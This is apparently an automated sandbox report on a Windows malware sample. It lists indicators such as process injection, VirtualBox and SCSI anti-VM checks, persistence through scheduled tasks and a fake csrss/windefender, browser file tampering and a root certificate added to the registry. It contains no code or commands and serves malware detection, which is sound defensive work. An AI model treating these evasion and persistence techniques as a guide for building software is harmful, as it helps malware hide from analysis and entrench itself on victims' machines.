file300un.exerun.execmd.exedescription pid process target process PID 368 set thread context of 5056 368 file300un.exe regasm.exe PID 2528 set thread context of 5496 2528 run.exe cmd.exe PID 5496 set thread context of 1456 5496 cmd.exe MSBuild.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
91jwA6wQnD20jEFlNGHkRWzr.exeuon7YhUxbxygHEmdqaGh1jhy.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN 91jwA6wQnD20jEFlNGHkRWzr.exe File opened (read-only) \??\VBoxMiniRdrDN uon7YhUxbxygHEmdqaGh1jhy.exe -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exegfswPFz.exedescription ioc process File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_tr.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fa.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxRes.dll msiexec.exe File created C:\Program Files (x86)\epoBtGYzqLvU2\VMyJsluIpBRKc.dll gfswPFz.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak gfswPFz.exe File created C:\Program Files\Oracle\VirtualBox\VBoxAutostartSvc.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDDR0.r0 msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDDU.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\x86\VBoxProxyStub-x86.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\x86\VBoxRT-x86.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSharedFolders.dll msiexec.exe File created C:\Program Files (x86)\zgoZGMcaU\MJlIBK.dll gfswPFz.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_sl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VirtualBoxVM.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDbg.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxGuestControlSvc.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_bg.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\platforms\qoffscreen.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5PrintSupportVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_lt.qm msiexec.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak gfswPFz.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDTrace.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\SDL.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VMMR0.r0 msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxCAPI.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxHostChannel.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxNetDHCP.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ca.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_es.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_it.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5WidgetsVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxVMM.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\lgw_postinstall.sh msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_nl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxHeadless.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxGuestAdditions.iso msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSDL.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\drivers\vboxdrv\VBoxDrv.cat msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDragAndDropSvc.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxNetDHCP.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxWebSrv.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\x86\msvcp100.dll msiexec.exe File created C:\Program Files (x86)\qIYKRzUEasUn\fQymhqv.dll gfswPFz.exe File created C:\Program Files\Oracle\VirtualBox\License_en_US.rtf msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5WinExtrasVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDD2.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\drivers\vboxdrv\VBoxDrv.inf msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxHeadless.dll msiexec.exe File created C:\Program Files (x86)\ecOJmsgAHWlsC\zInvEZW.xml gfswPFz.exe File created C:\Program Files\Oracle\VirtualBox\sdk\install\vboxapi\__init__.py msiexec.exe File created C:\Program Files\Oracle\VirtualBox\DbgPlugInDiggers.dll msiexec.exe File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\DkMDOrt.dll gfswPFz.exe File created C:\Program Files\Oracle\VirtualBox\VBoxNetNAT.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_id.qm msiexec.exe File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\qYUJOOH.xml gfswPFz.exe File created C:\Program Files\Oracle\VirtualBox\Qt5OpenGLVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDD.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\drivers\vboxdrv\VBoxDrv.sys msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSDL.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_de.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_th.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_zh_TW.qm msiexec.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi gfswPFz.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSupLib.dll msiexec.exe -
Drops file in Windows directory 21 IoCs
Processes:
fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe91jwA6wQnD20jEFlNGHkRWzr.exemsiexec.exeamert.exeuon7YhUxbxygHEmdqaGh1jhy.execsrss.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\explorta.job fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe File opened for modification C:\Windows\rss 91jwA6wQnD20jEFlNGHkRWzr.exe File created C:\Windows\Installer\e588642.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC} msiexec.exe File created C:\Windows\Tasks\chrosha.job amert.exe File opened for modification C:\Windows\rss uon7YhUxbxygHEmdqaGh1jhy.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\Installer\MSI8EAF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9C0E.tmp msiexec.exe File created C:\Windows\rss\csrss.exe 91jwA6wQnD20jEFlNGHkRWzr.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\yfARWRprRqUFWeTGf.job schtasks.exe File created C:\Windows\Tasks\JHJXtPPPvDXVqpH.job schtasks.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI8D47.tmp msiexec.exe File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job schtasks.exe File created C:\Windows\rss\csrss.exe uon7YhUxbxygHEmdqaGh1jhy.exe File created C:\Windows\Tasks\aNyMQclguOCSCcjxm.job schtasks.exe File opened for modification C:\Windows\Installer\e588642.msi msiexec.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 6332 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 6476 3564 WerFault.exe ZleUyzy9WRVICP6WvVkSUjzN.exe 4780 5876 WerFault.exe u2r0.0.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
u2r0.3.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2r0.3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2r0.3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2r0.3.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u2r0.0.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u2r0.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u2r0.0.exe -
Creates scheduled task(s) 1 TTPs 17 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5280 schtasks.exe 4564 schtasks.exe 7156 schtasks.exe 7064 schtasks.exe 5704 schtasks.exe 1512 schtasks.exe 5476 schtasks.exe 5212 schtasks.exe 2080 schtasks.exe 2200 schtasks.exe 1316 schtasks.exe 3556 schtasks.exe 6064 schtasks.exe 2228 schtasks.exe 2352 schtasks.exe 5700 schtasks.exe 1536 schtasks.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
Processes:
Install.exechrome.exeInstall.exerundll32.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exewindefender.exeuon7YhUxbxygHEmdqaGh1jhy.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exegfswPFz.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2631 = "Norfolk Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix gfswPFz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-3051 = "Qyzylorda Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Modifies registry class 2 IoCs
Processes:
chrome.exechrome.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3906287020-2915474608-1755617787-1000\{CBE6D7F6-EB26-4A9E-A8C4-A6EF2F50B9B5} chrome.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3906287020-2915474608-1755617787-1000\{9B399653-2FD6-46FC-ABB5-D38CD87273E8} chrome.exe -
Processes:
2MYMzGM0Ir1ZgoCjigWHeOoy.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 2MYMzGM0Ir1ZgoCjigWHeOoy.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 2MYMzGM0Ir1ZgoCjigWHeOoy.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e5251477